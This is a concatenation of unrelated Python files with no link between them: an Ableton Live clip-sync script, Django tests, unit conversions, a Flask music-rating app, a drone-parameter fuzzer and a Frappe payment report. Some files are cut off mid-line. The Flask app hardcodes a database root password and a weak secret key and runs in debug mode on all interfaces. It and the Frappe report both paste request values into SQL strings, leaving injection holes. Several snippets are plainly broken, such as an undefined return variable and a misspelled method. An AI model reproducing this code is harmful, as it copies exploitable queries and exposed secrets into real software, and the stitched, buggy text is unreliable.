self.clip.signature_denominator = clip.signature_denominator self.clip.view.grid_quantization = clip.view.grid_quantization self.clip.view.grid_is_triplet = clip.view.grid_is_triplet ############################## if self.clip.is_midi_clip: notes = _get_all_notes (clip) if _get_all_notes (self.clip) != notes: _replace_notes (self.clip, notes) else: # if self.clip.is_audio_clip self.clip.gain = clip.gain self.clip.pitch_coarse = clip.pitch_coarse self.clip.pitch_fine = clip.pitch_fine self.clip.warping = clip.warping = warping self.clip.warp_mode = clip.warp_mode def _change_another_clips_nonlisteners (self): def action_for_not_looped_clip (): pass if not self.clip.looping: if self.clip.is_audio_clip: warping = self.clip.warping # necessary, because when you turn on the loop the warping is automatically turned on self.clip.looping = True loop_start = self.clip.loop_start loop_end = self.clip.loop_end self.clip.looping = False if self.clip.is_audio_clip: self.clip.warping = warping def copy_loop_startend (): clip.looping = True clip.loop_start = loop_start clip.loop_end = loop_end clip.looping = False if clip.is_audio_clip: clip.warping = warping action_for_not_looped_clip = copy_loop_startend ######################################## for clip in self.another_clips (): action_for_not_looped_clip () clip.view.grid_quantization = self.clip.view.grid_quantization clip.view.grid_is_triplet = self.clip.view.grid_is_triplet ################################################# ################################################# def _on_clip_looping_changed (self): self.schedule_message (1, self._change_another_clips_looping) def _change_another_clips_looping (self): with Undo (): for clip in self.another_clips (): clip.looping = self.clip.looping def _on_clip_loop_start_changed (self): if self.clip.looping: self.schedule_message (1, self._change_another_clips_loop_start) def _change_another_clips_loop_start (self): with Undo (): for clip in self.another_clips (): clip.loop_start = self.clip.loop_start def _on_clip_loop_end_changed (self): if self.clip.looping: self.schedule_message (1, self._change_another_clips_loop_end) def _change_another_clips_loop_end (self): with Undo (): for clip in self.another_clips (): clip.loop_end = self.clip.loop_end def _on_clip_color_changed (self): self.schedule_message (1, self._change_another_clips_color) # since it is not possible to change the clip inside the listener def _change_another_clips_color (self): with Undo (): for clip in self.another_clips (): clip.color = self.clip.color def _on_clip_signature_numerator_changed (self): self.schedule_message (1, self._change_another_clips_signature_numerator) def _change_another_clips_signature_numerator (self): with Undo (): for clip in self.another_clips (): clip.signature_numerator = self.clip.signature_numerator def _on_clip_signature_denominator_changed (self): self.schedule_message (1, self._change_another_clips_signature_denominator) def _change_another_clips_signature_denominator (self): with Undo (): for clip in self.another_clips (): clip.signature_denominator = self.clip.signature_denominator def _on_clip_notes_changed (self): self.schedule_message (1, self._change_another_clips_notes) # since it is not possible to change the clip inside the listener def _change_another_clips_notes (self): notes = _get_all_notes (self.clip) with Undo (): for clip in self.another_clips (): _replace_notes (clip, notes) def _on_clip_gain_changed (self): self.schedule_message (1, self._change_another_clips_gain) def _change_another_clips_gain (self): with Undo (): for clip in self.another_clips (): clip.gain = self.clip.gain def _on_clip_pitch_coarse_changed (self): self.schedule_message (1, self._change_another_clips_pitch_coarse) def _change_another_clips_pitch_coarse (self): with Undo (): for clip in self.another_clips (): clip.pitch_coarse = self.clip.pitch_coarse def _on_clip_pitch_fine_changed (self): self.schedule_message (1, self._change_another_clips_pitch_fine) def _change_another_clips_pitch_fine (self): with Undo (): for clip in self.another_clips (): clip.pitch_fine = self.clip.pitch_fine def _on_clip_warping_changed (self): self.schedule_message (1, self._change_another_clips_warping) def _change_another_clips_warping (self): with Undo (): for clip in self.another_clips (): clip.warping = self.clip.warping def _on_clip_warp_mode_changed (self): self.schedule_message (1, self._change_another_clips_warp_mode) def _change_another_clips_warp_mode (self): with Undo (): for clip in self.another_clips (): clip.warp_mode = self.clip.warp_mode ####################################################### ####################################################### def another_clips (self): """ Return an iterator over all clips of the same type (MIDI/audio), excluding the current one. """ for track in self.song().tracks: if track.has_midi_input != self.clip.is_midi_clip: continue for clip_slot in track.clip_slots: if not clip_slot.has_clip: continue clip = clip_slot.clip if clip.name != self.clip.name: continue if self.clip.is_audio_clip and clip.file_path != self.clip.file_path: clip.name += u'\'' continue if clip != self.clip: yield clip self.arrangement_clips = set (filter (lambda clip: hasattr (clip, 'name'), self.arrangement_clips)) # only really existing clips for clip in self.arrangement_clips: if clip.name != self.clip.name or clip.is_midi_clip != self.clip.is_midi_clip: continue if self.clip.is_audio_clip and clip.file_path != self.clip.file_path: clip.name += u'\'' continue if clip != self.clip: yield clip def _get_all_notes (clip): assert isinstance (clip, Live.Clip.Clip) assert clip.is_midi_clip one_year_at_120bpm_in_beats = 63072000.0 far_time = one_year_at_120bpm_in_beats return clip.get_notes (-far_time, 0, 2*far_time, 128) def _replace_notes (clip, new_notes): assert isinstance (clip, Live.Clip.Clip) assert clip.is_midi_clip assert isinstance (new_notes, tuple) clip.select_all_notes () clip.replace_selected_notes (new_notes) clip.deselect_all_notes () class Undo (object): def __enter__ (self): Live.Application.get_application().get_document().begin_undo_step () def __exit__ (self, type, value, tb): Live.Application.get_application().get_document().end_undo_step () import datetime import pytest from django.utils import timezone @pytest.mark.integration def test_GET_as_other_user(client, client_factory, user_factory): """ Sending a GET request to the view as a non-admin user should return a 404 response. """ client.force_login(user_factory()) client_company = client_factory() url = client_company.unapproved_time_record_list_url response = client.get(url) assert response.status_code == 404 @pytest.mark.integration def test_GET_as_supervisor(client, client_admin_factory, time_record_factory): """ Sending a GET request to the view as a client supervisor should list the unapproved time records for the client. """ admin = client_admin_factory() client.force_login(admin.user) start_time = timezone.now() end_time = start_time + datetime.timedelta(hours=8) client_company = admin.client time_record_factory( employee__client=client_company, job__client=client_company, time_start=start_time, ) r1 = time_record_factory( employee__client=client_company, job__client=client_company, time_end=end_time, time_start=start_time, ) r2 = time_record_factory( employee__client=client_company, job__client=client_company, time_end=end_time, time_start=start_time, ) expected_records = [r1, r2] url = client_company.unapproved_time_record_list_url response = client.get(url) assert response.status_code == 200 assert list(response.context_data['time_records']) == expected_records SLAB_Diffusion/distances_conversions.py0 """******************************************************* This module has functions converting distances ***************************************************** """ #print(__doc__) def DM_to_pc(x):#converts distance modulus to distance in parsec psec=10**(x/5+1) return psec def pc_to_cm(x):#convert pc to cm cm=x*3.0857e18 return cm def pc_to_m(x):#convert pc to cm m=x*3.0857e16 return m def cm_to_pc(x): ps=x/(3.0857e18) return pc def solar_radius_to_m(x):#convert pc to cm m=x*6.957e8 return m def solar_radius_to_pc(x):#convert pc to cm m=x*2.25461e-8 return m def cm_to_solar_radius(x): sr=x/6.957e10 return sr def solar_radius_to_cm(x): cm=x*6.957e10 return cm # Generated by Django 3.2.9 on 2021-12-08 05:46 from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('gallery', '0006_auto_20211208_0838'), ] operations = [ migrations.RemoveField( model_name='profile', name='following', ), migrations.AddField( model_name='profile', name='followers', field=models.ManyToManyField(blank=True, related_name='followers', to=settings.AUTH_USER_MODEL), ), migrations.DeleteModel( name='FollowSystem', ), ] # Python Standard Libraries import numpy as np # grAdapt from .base import Equidistributed from grAdapt.utils.sampling import sample_points_bounds from grAdapt.utils.math.spatial import pairwise_distances class MaximalMinDistance(Equidistributed): """Maximal min distance sampling method A fixed amount of points are candidates. The candidate is chosen as a point if it has the highest minimal epsilon margin among other points. The minimal epsilon margin is the smallest distance between two points. Each point has an minimal epsilon margin. For a better performance, only a fixed amount of latest points are considered. Has a disadvantage: creates 'evil' neighbours. """ def __init__(self, n_candidates=10, window_size=500): """ Parameters ---------- n_candidates : integer number of candidates window_size : integer size of history points to consider. smaller is faster but worsen the results. """ super().__init__() self.n_candidates = n_candidates self.window_size = window_size def sample(self, bounds, n, x_history=None): """Samples low discrepancy/equidistributed sequences Method has to handle with new bounds and n. Parameters ---------- bounds : list of tuples or list of grAdapt.space.datatype.base Each tuple in the list defines the bounds for the corresponding variable Example: [(1, 2), (2, 3), (-1, 4)...] n : int number of points to be sampled x_history : array-like (2d) History points. Consider those to prevent sampling in dense regions. Returns ------- array-like (n, len(bounds)) Returns a 2D array. dim is the dimension of a single point Each row corresponds to a single point. Each column corresponds to a dimension. """ # set to new variables super().sample(bounds, n, x_history) if x_history is None: x_history = sample_points_bounds(self.bounds, 1) x_history_list = list(x_history) else: x_history_list = list(x_history) for i in range(self.n): x_history_sublist = x_history_list[-self.window_size:] candidates = sample_points_bounds(self.bounds, self.n_candidates) dists_matrix = pairwise_distances(candidates, np.array(x_history_sublist)) min_dists = np.min(dists_matrix, axis=1) max_min_dists = np.argmax(min_dists) x_history_list.append(candidates[max_min_dists]) return np.array(x_history_list)[-self.n:] #!/usr/bin/python3 """ This challenge is as follows: The parameter weekday is True if it is a weekday, and the parameter vacation is True if we are on vacation. We sleep in if it is not a weekday or we're on a vacation. Return True if we sleep in. Expected Results: False, False -> True True, False -> False False, True -> True True, True -> True """ def sleep_in(weekday, vacation): # This part is where the challenge is supposed to be solved if weekday: return True if vacation else False return True if __name__ == '__main__': # This part is only to test if challenge is a success print("Scenario 1: False, False: {}".format("success" if sleep_in(False, False) else "fail")) print("Scenario 2: True, False: {}".format("success" if not sleep_in(True, False) else "fail")) print("Scenario 3: False, True: {}".format("success" if sleep_in(False, True) else "fail")) print("Scenario 4: True, True: {}".format("success" if sleep_in(True, True) else "fail")) 0 # encoding=utf-8 from flask import Flask, render_template, session, redirect, url_for, request, flash from flask_script import Manager from flask_bootstrap import Bootstrap from flask_wtf import FlaskForm from wtforms import TextAreaField, SubmitField from wtforms.validators import DataRequired from databaseTransaction import dt from music_clustering import mc from test_decomposition import td import sys import time import numpy as np reload(sys) sys.setdefaultencoding('utf8') class EssayForm(FlaskForm): essay = TextAreaField('待分类文本', validators=[DataRequired()]) submit = SubmitField('提交') app = Flask(__name__) manager = Manager(app) bootstrap = Bootstrap(app) # 连接MYSQL数据库需要的配置信息 app.config['MYSQL_HOST'] = '127.0.0.1' app.config['MYSQL_USER'] = 'root' app.config['MYSQL_PASSWD'] = ',./' app.config['DB_MUSICS'] = 'musicslib' app.config['TABLE_NAME'] = 'musics_info' # 防止CSRF攻击的密钥 app.config['SECRET_KEY'] = 'hard to guess string' # 静态文件路径 app.config['MUSIC_FOLDER'] = 'static/musics' # 音乐导入密码 app.config['IMPORT_PASSWD'] = '' @app.route('/', methods=['GET', 'POST']) def index(): # 在session中记录音乐的数量 if not session.get('num_musics'): session['num_musics'] = 10 # 用户第一次访问时,获取音乐信息,并保存在session中 if not session.get('musics'): # 构造查询语句 query_statement = 'SELECT * FROM ' + app.config['TABLE_NAME'] + ' LIMIT 80, 10' # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) # 查询音乐信息,并保存在session中 session['musics'] = dt.query(db, query_statement) db.close() # 取得session中音乐的数量 n = session['num_musics'] # 处理POST请求 if request.method == 'POST': # 从form中获得用户评价信息,并写入数据库 judge = request.form.getlist('choice') # 如果一个都没选,代表跳过 if len(judge) == 0: session['num_musics'] -= 1 # 如果已经评完,重定向到完成页面 if session['num_musics'] == 0: session['finish'] = True return redirect(url_for('index')) return redirect(url_for('index')) # 判断选择数量是否符合要求 if len(judge) > 4: flash('最多选4个,请重新选择') return redirect(url_for('index')) # 音乐记录的第零个字段为主键 entry_id = session['musics'][n-1][0] # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) # 写数据 dt.write(db, app.config['TABLE_NAME'], entry_id, judge) # 断开连接 db.close() # 更新音乐数量 session['num_musics'] -= 1 # 显示提交成功的提示消息 flash('提交成功,还剩余%d首歌' % session['num_musics']) # 如果已经评完,重定向到完成页面 if session['num_musics'] == 0: session['finish'] = True return redirect(url_for('index')) return redirect(url_for('index')) # 处理GET请求 return render_template('index.html', music=session['musics'][n-1], n=n, finish=session.get('finish')) @app.route('/finish') def finish(): return render_template('finish.html') @app.route('/guide') def guide(): return render_template('guide.html') @app.route('/import', methods=['GET', 'POST']) def import_musics(): # 在session中保存验证信息 if not session.get('verified'): session['verified'] = False # 处理POST请求 if request.method == 'POST': if not session['verified']: passwd = request.form.get('password') if passwd == app.config['IMPORT_PASSWD']: session['verified'] = True return render_template('import.html', verified=session['verified']) else: flash('Verification code is not correct') else: # 获得歌曲信息 names = request.form.getlist('name') urls = request.form.getlist('url') absolutes = request.form.getlist('absolute') # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) # 插入新记录 num_musics = dt.insert(db, app.config['TABLE_NAME'], names, absolutes, urls) # 断开连接 db.close() flash('inserted %d new musics' % num_musics) # 处理GET请求 return render_template('import.html', verified=session['verified']) @app.route('/query') def info(): sql_statement = 'SELECT * FROM ' + app.config['TABLE_NAME'] # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) musics = dt.query(db, sql_statement) db.close() return render_template('info.html', musics=musics) @app.route('/cluster', methods=['GET', 'POST']) def cluster(): # 构造查询语句 query_statement = 'SELECT * FROM ' + app.config['TABLE_NAME'] # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) # 查询音乐信息 musics = dt.query(db, query_statement) db.close() # 音乐的数量 len_m = len(musics) if request.method == 'POST': # 执行聚类算法 try: k = int(request.form.get('k')) except ValueError: flash("请输入整数") return render_template('cluster.html', len_m=len_m) if k < 1: flash("聚类数必须大于等于1") return render_template('cluster.html', len_m=len_m) elif k > len_m: flash("聚类数必须小于等于歌曲的数量: %d" % len_m) return render_template('cluster.html', len_m=len_m) sentiments = mc.get_sentiments(musics) kmeans = mc.cluster_musics(list(sentiments), k) img_filename = str(time.time()) + '.png' td.decomp(np.mat(sentiments), img_filename, kmeans.labels_) # 构造聚类字典 clusters = {} num_cluster = len(kmeans.cluster_centers_) for i in range(num_cluster): clusters['%d' % i] = [] # i用于在页面顺序显示聚类 labels = kmeans.labels_.tolist() # print labels for i in range(len(musics)): music_info = [musics[i][1], musics[i][-1]] # 歌名和播放地址 clusters['%d' % labels[i]].append(music_info) # print clusters return render_template('cluster.html', clusters=clusters, len_m=len_m, img_filename=img_filename) return render_template('cluster.html', len_m=len_m) # 此路由用于将聚类结果写入数据库 @app.route('/admin/cluster/') def admin_cluster(k): # 构造查询语句 query_statement = 'SELECT * FROM ' + app.config['TABLE_NAME'] # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) # 查询音乐信息 musics = dt.query(db, query_statement) sentiments = mc.get_sentiments(musics) # 获得情感列表 # print 'sentiments:' # print sentiments # print 'k:', k kmeans = mc.cluster_musics(list(sentiments), int(k)) # 聚类 mc.write_cluster_to_database(kmeans.labels_.tolist(), db, app.config['TABLE_NAME']) db.close() return 'Succeed' @app.route('/analysis/') def analysis(essay): from sentimentAnalysis import sa # 导入情感分析模块 print essay word_list = sa.word_segmentation(essay=essay) # 分词 word_freq = sa.frequency_count(word_list) # 词频统计 word_info = sa.make_query(word_freq) # 获得词语信息 sentiment = sa.method_weighted_word_freq(word_info=word_info, word_freq=word_freq) # 获得情感分类 cluster_id = sa.cluster_sent_map[sentiment] # 获得情感对应的聚类标签 # 查询cluster内的歌曲 query_statement = 'SELECT * FROM ' + app.config['TABLE_NAME'] + ' WHERE m_cluster=' + str(cluster_id) # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) # 查询音乐信息 musics = dt.query(db, query_statement) import random res = musics[random.randint(0, len(musics)-1)] # 随机选择一首cluster内的歌曲 return '%s' % res[-1] @app.errorhandler(404) def page_not_found(e): return render_template('404.html'), 404 @app.errorhandler(500) def internal_server_error(e): return render_template('500.html'), 500 if __name__ == '__main__': app.run(debug=True, host='0.0.0.0') from io import BytesIO import requests from aip import AipOcr from nonebot import get_driver from PIL import Image from nonebot import logger from .data_load import PATH api_key = get_driver().config.ocr_key client = AipOcr(api_key['appId'], api_key['apiKey'], api_key['secretKey']) def save_pic(url :str, name: str): res = requests.get(url) img = Image.open(BytesIO(res.content)) img.save(PATH + name + ".png") def check_pic(url :str): res = client.basicGeneralUrl(url) logger.info('识别完成') if {'words': '配餐中'} in res['words_result'] and {'words': '待取餐'} in res['words_result']: return True Oleksii-Kshenskyi/purple_tools0 import argparse import sys class ErrorRaisingArgumentParser(argparse.ArgumentParser): def error(self, message): raise sys.exc_info()[1] class ArithmeticParser: def _get_help_for_positional_argument(self, position): return '{0} positional arithmetic operation argument.'.format(position) def _add_arguments(self, parser): parser.add_argument("operation", help="Arithmetic operation to perform.", choices=self.operations.keys()) parser.add_argument('first', type=int, help=self._get_help_for_positional_argument("First")) parser.add_argument('second', type=int, help=self._get_help_for_positional_argument("Second")) def run_operation(self, op_type, first, second): return self.operations[op_type](first, second) def add(self, a, b): return a + b def mul(self, a, b): return a * b def sub(self, a, b): return a - b def div(self, a, b): return a / b def __init__(self): self.operations = {"add": self.add, "sub": self.sub, "mul": self.mul, "div": self.div} self.parser = ErrorRaisingArgumentParser() self._add_arguments(self.parser) def run(self): parsing_result = self.parser.parse_args() return self.run_operation(parsing_result.operation, parsing_result.first, parsing_result.second) if __name__ == "__main__": print(ArithmeticParser().run())test/leaf_test.py import unittest from decision_tree.leaf import Leaf class LeafTest(unittest.TestCase): def test_leaf_constructor(self): expected_predictions = {'Grape': 2} rows = [['Red', 1, 'Grape'], ['Red', 1, 'Grape']] leaf = Leaf(rows) self.assertEqual(expected_predictions, leaf.predictions) def test_equals(self): rows = [['Red', 1, 'Grape'], ['Red', 1, 'Grape']] self.assertEqual(Leaf(rows), Leaf(rows)) if __name__ == '__main__': unittest.main() import turtle '''turtle.shape('square') finn=turtle.clone() finn.shape('square') finn.forward (100) finn.right(90) finn.forward(100) finn.right(90) finn.forward(100) finn.right(90) finn.forward(100) sam.shape('triangle') sam.left(45) sam.stamp() sam.forward(100) sam.stamp() sam.clearstamps() sam.right(130) sam.forward(100)''' sam=turtle.clone() sam.shape('circle') turtle.bgcolor('purple') sam.color('white') sam.stamp() sam.goto(0,0) sam.pensize(12) sam.goto(0,100) sam.color('yellow') sam.goto(50,100) sam.goto(50,0) sam.color('green') sam.goto(50,-100) sam.goto(100,-100) sam.color('blue') sam.shape('arrow') sam.goto(100,0) def up(): sam.setheading(90) sam.forward(50) sam.onkeypress(up,'w') def down(): sam.setheading(180) sam.forward(50) sam.onkeypress(down,'s') def left(): sam.setheadling(270) sam.left(50) sam.onkeypress(left,'a') def right(): sam.setheading(90) sam.right(50) sam.onkeypress(right,'d') sam.listen() src/python/data_generator.py ########################################## # Implementation of a generator based on # https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly.html ########################################## import os, sys import numpy as np import pandas as pd import keras class DataGenerator(keras.utils.Sequence): 'Generates data for Keras' def __init__(self, list_IDs, batch_size, max_len_model, path_data, n_chars, indices_token, token_indices, pad_char, start_char, end_char, shuffle=True): 'Initialization' self.max_len_model = max_len_model self.batch_size = batch_size self.list_IDs = list_IDs self.shuffle = shuffle self.path_data = path_data self.n_chars = n_chars self.pad_char = pad_char self.start_char = start_char self.end_char = end_char self.on_epoch_end() f=open(self.path_data) self.lines=f.readlines() self.indices_token = indices_token self.token_indices = token_indices def __len__(self): 'Denotes the number of batches per epoch' return int(np.floor(len(self.list_IDs) / self.batch_size)) def __getitem__(self, index): 'Generate one batch of data' # Generate indexes of the batch indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size] # Find list of IDs list_IDs_temp = [self.list_IDs[k] for k in indexes] # Generate data X, y = self.__data_generation(list_IDs_temp) return X, y def on_epoch_end(self): 'Updates indexes after each epoch' self.indexes = np.arange(len(self.list_IDs)) if self.shuffle == True: np.random.shuffle(self.indexes) def one_hot_encode(self, token_list, n_chars): output = np.zeros((token_list.shape[0], n_chars)) for j, token in enumerate(token_list): output[j, token] = 1 return output def smi_to_int(self, smile): """ this will turn a list of smiles in string format and turn them into a np array of int, with padding """ token_list = self.tokenize_sequence(smile) self.pad_seqs(token_list) int_list = [int(x[0]) for x in token_list] return np.asarray(int_list) def tokenize_sequence(self, smile): """ Tokenizes a list of sequences into a list of token lists """ token_lists = [] for x in smile: mol_tokens = [] posit = 0 while posit < len(x): t, p = self.get_token(x, posit) posit = p mol_tokens += [self.token_indices[t]] token_lists.append(mol_tokens) return token_lists def get_token(self, text, position): """ Return token from text at a particular position, assumes given position is valid """ return list(text)[position], position + 1 def pad_seqs(self, sequence): """ Pad sequences to given length """ padding = [self.token_indices[self.pad_char]]*(self.max_len_model - len(sequence)) padding_arr = [[x] for x in padding] sequence.extend(padding_arr) def enclose_smile(self, smi): """ Add the start and end char. Used when we read smiles directly from the txt file """ smi = self.start_char + smi + self.end_char return smi def clean_smile(self, smi): """ remove return line symbols if present """ smi = smi.replace('\n', '') return smi def __data_generation(self, list_IDs_temp): 'Generates batch of data containing batch_size samples' switch = 1 y = np.empty((self.batch_size, self.max_len_model-switch, self.n_chars), dtype=int) X = np.empty((self.batch_size, self.max_len_model-switch, self.n_chars), dtype=int) for i, ID in enumerate(list_IDs_temp): smi = self.lines[ID] # remove return line symbols smi = self.clean_smile(smi) # add starting and ending char smi = self.enclose_smile(smi) data = self.smi_to_int(smi) X[i] = self.one_hot_encode(data[:-1], self.n_chars) y[i] = self.one_hot_encode(data[1:], self.n_chars) return X, y scripts/test/validate-user.py from gitgang.github import members_only members_only(github_org='kazstat', github_repo='sdg-data-kazstat', gangfile='scripts/test/github-users.yml') #! /usr/bin/env python3 #-*- coding: UTF-8 -*- ### Legal # # Author: <> # License: ISC # from Urcheon.StageParse import StageParse from Urcheon import Pak import sys def main(): arg_stage = StageParse(description="%(prog)s is a tender knight who takes care of my lovely granger's little flower.") arg_stage.addStage("clean", help="clean stuff") arg_stage.addStage("discover", help="discover files") arg_stage.addStage("prepare", help="prepare source pakdir") arg_stage.addStage("build", help="build test pakdir") arg_stage.addStage("package", help="package release pak") arg_stage = arg_stage.parseArgs() stage = None if arg_stage.clean: stage = Pak.clean if arg_stage.discover: stage = Pak.discover if arg_stage.prepare: stage = Pak.prepare if arg_stage.build: stage = Pak.build if arg_stage.package: stage = Pak.package if stage: del sys.argv[1] stage(arg_stage.stage) if __name__ == "__main__": main() import asyncio import functools import ssl import typing import httpx import sniffio from httpx.backends.asyncio import SocketStream from httpx.backends.base import BaseSocketStream from httpx.dispatch.connection import HTTPConnection from httpx.dispatch.connection_pool import ConnectionPool async def open_uds_socket_stream( path: str, hostname: str, timeout: httpx.Timeout, ssl_context: ssl.SSLContext = None ) -> BaseSocketStream: async_library = sniffio.current_async_library() assert async_library == "asyncio" server_hostname = hostname if ssl_context else None try: stream_reader, stream_writer = await asyncio.wait_for( asyncio.open_unix_connection( path, ssl=ssl_context, server_hostname=server_hostname ), timeout.connect_timeout, ) except asyncio.TimeoutError: raise httpx.ConnectTimeout() return SocketStream(stream_reader=stream_reader, stream_writer=stream_writer) class UnixSocketHTTPConnection(HTTPConnection): def __init__(self, *, uds: str, **kwargs: typing.Any) -> None: super().__init__(**kwargs) self.uds = uds async def open_socket_stream( self, origin: httpx.Origin, timeout: httpx.Timeout, ssl_context: ssl.SSLContext = None, ) -> BaseSocketStream: path = self.uds host = origin.host self.logger.trace( f"start_connect uds path={path!r} host={host!r} timeout={timeout!r}" ) return await open_uds_socket_stream( path=path, hostname=host, timeout=timeout, ssl_context=ssl_context ) class UnixSocketConnectionPool(ConnectionPool): def __init__(self, *, uds: str, **kwargs: typing.Any) -> None: super().__init__(**kwargs) self.uds = uds def get_connection_factory(self) -> typing.Callable[..., HTTPConnection]: return functools.partial(UnixSocketHTTPConnection, uds=self.uds) import argparse import csv import os import time import numpy as np import pandas as pd from Cptool.config import toolConfig from Cptool.gaSimManager import GaSimManager from uavga.fuzzer import LGFuzzer # from Cptool.gaSimManager import GaSimManager if __name__ == '__main__': parser = argparse.ArgumentParser(description='Personal information') parser.add_argument('--device', dest='device', type=str, help='Name of the candidate') args = parser.parse_args() device = args.device if device is None: device = 0 print(device) param = [ "PSC_POSXY_P", "PSC_VELXY_P", "PSC_POSZ_P", "ATC_ANG_RLL_P", "ATC_ANG_PIT_P", "ATC_ANG_YAW_P", "ATC_RAT_RLL_I", "ATC_RAT_RLL_D", "ATC_RAT_RLL_P", "ATC_RAT_PIT_P", "ATC_RAT_PIT_I", "ATC_RAT_PIT_D", "ATC_RAT_YAW_P", "ATC_RAT_YAW_I", "ATC_RAT_YAW_D", "WPNAV_SPEED", "WPNAV_SPEED_UP", "WPNAV_SPEED_DN", "WPNAV_ACCEL", "ANGLE_MAX", ] # lgfuizzer = LGFuzzer(param, f'model/{Cptool.config.MODE}/{ModelFit.config.INPUT_LEN}/lstm.h5', # f'model/{Cptool.config.MODE}//trans.pkl', # f"./log/{Cptool.config.MODE}/csv/train.csv") # # lgfuizzer.run(num=3, meanshift=True) candidate_var, candidate_obj = LGFuzzer.return_random_n_gen(5) candidate_obj = np.array(candidate_obj, dtype=float).round(8) candidate_var = np.array(candidate_var, dtype=float).round(8) manager = GaSimManager(debug=toolConfig.DEBUG) results = [] i = 0 # 乱序 rand_index = (np.arange(candidate_obj.shape[0])) np.random.shuffle(rand_index) candidate_obj = candidate_obj[rand_index] candidate_var = candidate_var[rand_index] for index, vars, value_vector in zip(np.arange(candidate_obj.shape[0]), candidate_var, candidate_obj): # if skip if os.path.exists(f'result/params.csv'): while not os.access(f"result/params.csv", os.R_OK): continue data = pd.read_csv(f'result/params.csv') exit_data = data.drop(['score', 'result'], axis=1, inplace=False) if ((exit_data - value_vector).sum(axis=1).abs() < 0.00001).sum() > 0: continue manager.start_multiple_sitl(device) manager.mav_monitor_init(device) if not manager.mav_monitor_connect(): manager.stop_sitl() continue manager.mav_monitor_set_mission("Cptool/mission.txt", random=True) manager.mav_monitor_set_param(params=param, values=value_vector) print(f'======================={index} / {candidate_obj.shape[0]} ==========================') # manager.start_mav_monitor() manager.mav_monitor_start_mission() result = manager.mav_monitor_error() if result == 'skip': results.append(result) else: if not os.path.exists(f'result/params.csv'): while not os.access(f"result/params.csv", os.W_OK): continue data = pd.DataFrame(columns=(toolConfig.PARAM + ['score', 'result'])) else: while not os.access(f"result/params.csv", os.W_OK): continue tmp_row = value_vector.tolist() tmp_row.append(vars[0]) tmp_row.append(result) # Write Row with open("result/params.csv", 'a+') as f: csv_file = csv.writer(f) csv_file.writerow(tmp_row) manager.stop_sitl() i += 1 localtime = time.asctime(time.localtime(time.time())) # send_mail(Cptool.config.AIRSIM_PATH, localtime)tests/zed/out.py import magma as m import mantle from loam.boards.zed import Zed zed = Zed() zed.LED.on(2) main = zed.main() m.wire( 1, main.LED[0] ) m.wire( 1, main.LED[1] ) version https://git-lfs.github.com/spec/v1 oid sha256:7aea346f0d4b2627a21e9fd7189962ecdc9b5532676091f77155347083010ab7 size 7245 nextcertification/nextcertification/report/application_payment/application_payment.py # Copyright (c) 2013, Sameer and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe def execute(filters=None): columns = get_columns() data = get_data(filters) return columns, data def get_columns(): columns = [ { "fieldname": "application", "fieldtype": "Link", "label": "Application", "options": "Application", "width": 200 }, { "fieldname": "sales_invoice", "fieldtype": "Link", "label": "Sales Invoice", "options": "Sales Invoice", "width": 200 }, { "fieldname": "invoice_status", "fieldtype": "Data", "label": "Invoice Status", "width": 150 }, { "fieldname": "payment_entry", "fieldtype": "Link", "label": "Payment Entry", "options": "Payment Entry", "width": 200 }, { "fieldname": "payment_status", "fieldtype": "Data", "label": "Payment Status", "width": 150 }, { "fieldname": "bill_amt", "fieldtype": "Float", "label": "Billed Amount", "width": 150 }, { "fieldname": "pending_amt", "fieldtype": "Float", "label": "Pending Amount", "width": 150 } ] return columns def get_data(filters =None): query = """select TP.name as application, TSI.name as sales_invoice, TSI.status as invoice_status, pe.name as payment_entry, CASE WHEN pe.docstatus = 0 THEN 'draft' WHEN pe.docstatus = 1 THEN 'Submitted' WHEN pe.docstatus = 2 THEN 'Cancelled' ELSE Null END as payment_status, TSI.rounded_total as bill_amt, TSI.outstanding_amount as pending_amt from `tabApplication` as TP left join `tabSales Invoice` as TSI on TP.name = TSI.application left join `tabPayment Entry Reference` as per on TSI.name = per.reference_name and per.reference_doctype = 'Sales Invoice' left join `tabPayment Entry` as pe on pe.name = per.parent where TP.docstatus = 1 and TP.date between '{0}' and '{1}'""".format(filters.get('from_date'),filters.get('to_date')) if filters.get('application'): query += " and TP.name = '{0}'".format(filters.get('application')) result = frappe.db.sql(query ,as_dict=True) return result1-10 import typing from abc import abstractmethod from vkbottle.dispatch.rules import ABCRule class ABCFilter(ABCRule): @property @abstractmethod def rules(self) -> typing.Iterable[ABCRule]: pass # Setup.py file from setuptools import find_packages, setup with open("README.md", "r") as fh: long_description = fh.read() setup( name="my_lambdata_zarabi", # the name that you will install via pip version="1.3", author="", author_email="", description="A short description", long_description=long_description, long_description_content_type="text/markdown", # required if using a md file for long desc license="MIT", url="https://github.com/misqualzarabi/lambdata_misqual_z", # keywords="", packages=find_packages() # ["my_lambdata"] ) torabot/mods/ehentai/spy/ehentai/spiders/__init__.py # This package will contain the spiders of your Scrapy project # # Please refer to the documentation for information on how to create and manage # your spiders. import pytz import traceback from datetime import datetime from urllib import urlencode from scrapy.http import Request from scrapy.selector import Selector from scrapy.contrib.loader import ItemLoader from scrapy.contrib.loader.processor import Identity, TakeFirst from torabot.spy.spiders.redis import RedisSpider from torabot.spy.spiders.mixins import RequestMethodMixin from torabot.spy.error import failed from torabot.ut.time import TIME_FORMAT from ..items import Page, Post from 